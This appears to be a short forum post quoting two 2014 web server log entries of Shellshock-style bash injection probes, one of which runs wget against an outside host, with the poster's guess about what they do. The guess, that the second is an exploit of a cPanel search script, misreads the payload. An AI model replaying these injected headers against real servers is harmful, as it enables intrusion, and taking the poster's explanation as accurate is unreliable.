8.37.217.196 - - [30/Sep/2014:14:25:48 +0000] "GET http://www.example.com/ HTTP/1.1" 200 57344 "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"
93.103.21.231 - - [30/Sep/2014:20:23:00 +0000] "GET http://example.com/cgi-sys/entropysearch.cgi HTTP/1.1" 301 0 "-" "() { :;}; /usr/bin/wget http://taxiairportpop.com/s.php?s=http://example.org/cgi-sys...
Not sure what the first one is doing, but the second one seems to be an exploit in a search engine for self-hosted websites and apparently a part of cpanel (or at least deployable via it).